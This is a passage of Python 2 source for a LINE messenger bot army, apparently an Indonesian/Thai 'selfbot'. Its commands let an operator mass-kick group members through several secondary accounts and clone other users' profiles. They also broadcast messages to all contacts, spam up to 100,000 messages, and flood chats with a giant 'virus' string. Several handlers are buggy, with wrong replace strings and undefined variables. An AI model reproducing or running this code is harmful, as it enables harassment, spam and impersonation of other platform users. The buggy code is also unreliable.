request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Indonesia----\n" + "" + kata + "\n\n----Ke Inggris----\n" + "" + result)
elif "En@id" in msg.text:
bahasa_awal = 'en'
bahasa_tujuan = 'id'
kata = msg.text.replace("En@id ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Inggris----\n" + "" + kata + "\n\n----Ke Indonesia----\n" + "" + result)
elif "Id@th" in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'th'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Indonesia----\n" + "" + kata + "\n\n----Ke Thailand----\n" + "" + result)
elif "Th@id" in msg.text:
bahasa_awal = 'th'
bahasa_tujuan = 'id'
kata = msg.text.replace("Id@en ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
result = result.split("<")[0]
cl.sendText(msg.to,"----Dari Thailand----\n" + "" + kata + "\n\n----Ke Indonesia----\n" + "" + result)
elif msg.text in ["Friendlist"]:
contactlist = cl.getAllContactIds()
kontak = cl.getContacts(contactlist)
num=1
msgs="═════════List Friend═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Friend═════════\n\nTotal Friend : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Memlist"]:
kontak = cl.getGroup(msg.to)
group = kontak.members
num=1
msgs="═════════List Member═�����═══════-"
for ids in group:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(group)
cl.sendText(msg.to, msgs)
#=========================================
elif msg.text in ["Mimic on","mimic on"]:
if wait3["copy"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic On")
else:
wait3["copy"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic On")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Mimic off","mimic:off"]:
if wait3["copy"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already on")
else:
cl.sendText(msg.to,"Mimic Off")
else:
wait3["copy"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Mimic Off")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Target list"]:
if wait3["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in wait3["target"]:
mc += "✔️ "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if wait3["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
wait3["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
wait3["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Target @" in msg.text:
target = msg.text.replace("Target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
wait3["target"][t] = True
cl.sendText(msg.to,"Target added")
elif "Del target @" in msg.text:
target = msg.text.replace("Del target @","")
gc = cl.getGroup(msg.to)
targets = []
for member in gc.members:
if member.displayName == target.rstrip(' '):
targets.append(member.mid)
if targets == []:
cl.sendText(msg.to, "User not found")
else:
for t in targets:
del wait3["target"][t]
cl.sendText(msg.to,"Target deleted")
#=======================================
#========================================
elif "Nk " in msg.text:
nk0 = msg.text.replace("Nk ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
gs.preventJoinByTicket = False
cl.updateGroup(gs)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
time.sleep(0.2)
targets = []
for s in gs.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
try:
Ki5.kickuotFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
Ki5.leaveGroup(msg.to)
gs = cl.getGroup(msg.to)
gs.preventJoinByTicket = True
Cl.updateGroup(gs)
gs.preventJoinByTicket(gs)
Cl.updateGroup(gs)
#----------------------------------------------------
elif msg.text in ["Aslogin","ขอลิ้ง"]:
if AsulLogged == False:
ki.login(qr=True)
ki.loginResult()
user2 = ki6.getProfile().mid
AsulLogged = True
cl.sendText(msg.to,"ล็อคอินสำเร็จ Asul พร้อมใช้งานแล้ว")
else:
cl.sendText(msg.to,"Asul ได้ทำการล็อคอินไปแล้ว")
elif msg.text.lower() == ".":
gs = []
try:
gs = cl.getGroup(msg.to).members
except:
try:
gs = cl.getRoom(msg.to).contacts
except:
pass
tlist = ""
for i in gs:
tlist = tlist+i.displayName+" "+i.mid+"\n\n"
if AsulLogged == True:
try:
ki.sendText(user1,tlist)
except:
ki.new_post(tlist)
else:
cl.sendText(msg.to,"Asul ยังไม่ได้ล็อคอิน")
#-----------------------------------------------------------)
elif msg.text in ["Help2","Key","KEY"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage2)
else:
cl.sendText(msg.to,helpt)
#----------------------ADMIN COMMAND------------------------------#
elif ("Kick " in msg.text):
if msg.from_ in admin:
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif msg.text in ["Mention","Tagall"]:
group = cl.getGroup(msg.to)
k = len(group.members)//100
for j in xrange(k+1):
msg = Message(to=msg.to)
txt = u''
s=0
d=[]
for i in group.members[j*100 : (j+1)*100]:
d.append({"S":str(s), "E" :str(s+8), "M":i.mid})
s += 9
txt += u'@Krampus\n'
msg.text = txt
msg.contentMetadata = {u'MENTION':json.dumps({"MENTIONEES":d})}
cl.sendMessage(msg)
elif "Ratakan" in msg.text:
if msg.from_ in admin:
nk0 = msg.text.replace("Ratakan","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("all","")
nk3 = nk2.rstrip()
_name = nk3
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"user does not exist")
pass
else:
for target in targets:
if not target in Bots:
if not target in admin:
try:
klist=[ki2,ki3,ki4,ki5]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
cl.sendText(msg.to,"Sukses Bosqu")
cl.sendText(msg.to,"masih mauko sundala")
elif msg.text in ["List grup"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
h = "===[List Groups]==="
total = str(len(gid))
for i in gid:
if i is not None:
try:
groups = cl.getGroup(i)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h += "\n[" + groups.name + "] ->(" + members +")\n -+GroupID : " + i
except:
break
else:
break
if gid is not None:
cl.sendText(msg.to,h + "\n|[Total Groups]| : " + str(total))
else:
cl.sendText(msg.to,"Tidak ada grup saat ini")
ginv = cl.getGroupIdsInvited()
j = "===[List Groups Invited]==="
totals = str(len(ginv))
for z in ginv:
if z is not None:
try:
groups = cl.getGroup(z)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
j += "\n[" + groups.name + "] ->(" + members + ")\n -+GroupID : " + i
except:
break
else:
break
if ginv is not None:
cl.sendText(msg.to,j + "\n|[Total Groups Invited]| : " + str(totals))
else:
cl.sendText(msg.to,"Tidak ada grup tertunda saat ini")
elif msg.text in ["Info grup"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
cl.sendText(msg.to,"===[List Details Group]===")
total = str(len(gid))
for i in gid:
if i is not None:
try:
groups = ki.getGroup(i)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h = "[" + groups.name + "]\n -+GroupID : " + i + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName
except:
break
else:
break
if gid is not None:
cl.sendText(msg.to,h)
cl.sendText(msg.to,"|[Total Groups]| : " + str(total))
else:
cl.sendText(msg.to,"Tidak ada grup saat ini")
ginv = cl.getGroupIdsInvited()
cl.sendText(msg.to,"===[List Details Groups Invited]===")
totals = str(len(ginv))
for z in ginv:
if z is not None:
try:
groups = cl.getGroup(z)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
j = "[" + groups.name + "]\n -+GroupID : " + i + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName
except:
break
else:
break
if ginv is not None:
cl.sendText(msg.to,j)
cl.sendText(msg.to,"|[Total Groups Invited]| : " + str(totals))
else:
cl.sendText(msg.to,"Tidak ada grup tertunda saat ini")
elif "Details grup: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("/DetailsGroup: ","")
if gid in [""," "]:
cl.sendText(msg.to,"Grup id tidak valid")
else:
try:
groups = cl.getGroup(gid)
if groups.members is not None:
members = str(len(groups.members))
else:
members = "0"
if groups.invitee is not None:
pendings = str(len(groups.invitee))
else:
pendings = "0"
h = "[" + groups.name + "]\n -+GroupID : " + gid + "\n -+Members : " + members + "\n -+MembersPending : " + pendings + "\n -+Creator : " + groups.creator.displayName + "\n -+GroupPicture : http://dl.profile.line.naver.jp/" + groups.pictureStatus
cl.sendText(msg.to,h)
except Exception as error:
cl.sendText(msg.to,(error))
elif "Cancel invite: " in msg.text:
if msg.from_ in admin:
gids = msg.text.replace("Cancel invite: ","")
gid = cl.getGroup(gids)
for i in gid:
if i is not None:
try:
cl.rejectGroupInvitation(i)
except:
cl.sendText(msg.to,"Error!")
break
else:
break
if gid is not None:
cl.sendText(msg.to,"Berhasil tolak undangan dari grup " + gid.name)
else:
cl.sendText(msg.to,"Grup tidak ditemukan")
elif msg.text in ["Accept invite"]:
if msg.from_ in admin:
gid = cl.getGroupIdsInvited()
_list = ""
for i in gid:
if i is not None:
gids = cl.getGroup(i)
_list += gids.name
cl.acceptGroupInvitation(i)
else:
break
if gid is not None:
cl.sendText(msg.to,"Berhasil terima semua undangan dari grup :\n" + _list)
else:
cl.sendText(msg.to,"Tidak ada grup yang tertunda saat ini")
elif "Myname: " in msg.text:
string = msg.text.replace("Myname: ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Bio" + string)
elif "Mybio: " in msg.text:
string = msg.text.replace("Mybio: ","")
if len(string.decode('utf-8')) <= 500:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Update Bio" + string)
elif ("Gname: " in msg.text):
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.name = msg.text.replace("Gname: ","")
cl.updateGroup(group)
else:
cl.sendText(msg.to,"Tidak Dapat Mengubah Nama Grup")
elif "Kick: " in msg.text:
if msg.from_ in admin:
midd = msg.text.replace("Kick: ","")
cl.kickoutFromGroup(msg.to,[midd])
elif msg.text in ["Invite:","ดึง:"]:
if msg.from_ in admin:
midd = msg.text.replace("Invite: ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif "My @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("My @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(msg.to, path)
except:
pass
print "[Command]dp executed"
elif "Copy @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.cloneContactProfile(target)
cl.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy1 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy1 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki.cloneContactProfile(target)
ki.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy2 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy2 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki2.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki2.cloneContactProfile(target)
ki2.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy3 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy3 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki3.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki3.cloneContactProfile(target)
ki3.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy4 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy4 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki4.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki4.cloneContactProfile(target)
ki4.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif "Copy5 @" in msg.text:
if msg.toType == 2:
if msg.from_ in admin:
print "[COPY] Ok"
_name = msg.text.replace("Copy5 @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki5.sendText(msg.to, "Tidak Ada Target Copy")
else:
for target in targets:
try:
ki5.cloneContactProfile(target)
ki5.sendText(msg.to, "Sukses Copy Profile")
except Exception as e:
print e
elif msg.text in ["backup"]:
try:
cl.updateDisplayPicture(mybackup.pictureStatus)
cl.updateProfile(mybackup)
cl.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
cl.sendText(msg.to, str (e))
elif msg.text in ["Backup"]:
try:
ki.updateDisplayPicture(backup.pictureStatus)
ki.updateProfile(backup)
ki.sendText(msg.to, "Backup Sukses Bosqu")
except Exception as e:
ki.sendText(msg.to, str (e))
elif "Bc:ct " in msg.text:
bctxt = msg.text.replace("Bc:ct ", "")
a = cl.getAllContactIds()
for manusia in a:
cl.sendText(manusia, (bctxt))
elif "Bot:ct " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Bot:ct ", "")
b = ki.getAllContactIds()
for manusia in b:
ki.sendText(manusia, (bctxt))
c = ki2.getAllContactIds()
for manusia in c:
ki2.sendText(manusia, (bctxt))
d = ki3.getAllContactIds()
for manusia in d:
ki3.sendText(manusia, (bctxt))
e = ki4.getAllContactIds()
for manusia in e:
ki4.sendText(manusia, (bctxt))
f = ki5.getAllContactIds()
for manusia in f:
ki5.sendText(manusia, (bctxt))
elif "Bc:grup " in msg.text:
bctxt = msg.text.replace("Bc:grup ", "")
a = cl.getGroupIdsJoined()
for manusia in a:
cl.sendText(manusia, (bctxt))
elif "Bot:grup " in msg.text:
if msg.from_ in admin:
bctxt = msg.text.replace("Bot:grup ", "")
b = ki.getGroupIdsJoined()
for manusia in b:
ki.sendText(manusia, (bctxt))
c = ki2.getGroupIdsJoined()
for manusia in c:
ki2.sendText(manusia, (bctxt))
d = ki3.getGroupIdsJoined()
for manusia in d:
ki3.sendText(manusia, (bctxt))
e = ki4.getGroupIdsJoined()
for manusia in e:
ki4.sendText(manusia, (bctxt))
f = ki5.getGroupIdsJoined()
for manusia in f:
ki5.sendText(manusia, (bctxt))
elif "Spam " in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (teks+"\n")
if txt[1] == "on":
if jmlh <= 100000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of Range!")
elif txt[1] == "off":
if jmlh <= 100000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out Of Range!")
elif msg.text in ["me","Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif cms(msg.text,["แอดมิน","Creator"]):
msg.contentType = 13
msg.contentMetadata = {'mid': admsa}
cl.sendText(msg.to," My Creator ")
cl.sendMessage(msg)
cl.sendText(msg.to," Dont Kick out From group ")
elif "Inviteme: " in msg.text:
if msg.from_ in admin:
gid = msg.text.replace("Inviteme: ","")
if gid == "":
cl.sendText(msg.to,"Invalid group id")
else:
try:
cl.findAndAddContactsByMid(msg.from_)
cl.inviteIntoGroup(gid,[msg.from_])
except:
cl.sendText(msg.to,"Mungkin saya tidak di dalaam grup itu")
elif msg.text in ["Clear grup"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
gid = ki.getGroupIdsJoined()
gid = ki2.getGroupIdsJoined()
gid = ki3.getGroupIdsJoined()
gid = ki4.getGroupIdsJoined()
gid = ki5.getGroupIdsJoined()
for i in gid:
ki.leaveGroup(i)
ki2.leaveGroup(i)
ki3.leaveGroup(i)
ki4.leaveGroup(i)
ki5.leaveGroup(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Bot Sudah Keluar Di semua grup")
else:
cl.sendText(msg.to,"He declined all invitations")
elif msg.text in ["Ginfo","เชคกลุ่ม"]:
group = cl.getGroup(msg.to)
try:
gCreator = group.creator.displayName
except:
gCreator = "Error"
md = "[Nama Grup : ]\n" + group.name + "\n\n[Id Grup : ]\n" + group.id + "\n\n[Pembuat Grup :]\n" + gCreator + "\n\n[Gambar Grup : ]\nhttp://dl.profile.line-cdn.net/" + group.pictureStatus
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
elif msg.text == "ไวรัส01":
cl.sendText(msg.to,"หยุดดดดดด....\nขอให้ทุกคนอยู่ในความสงบ\n\n 1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.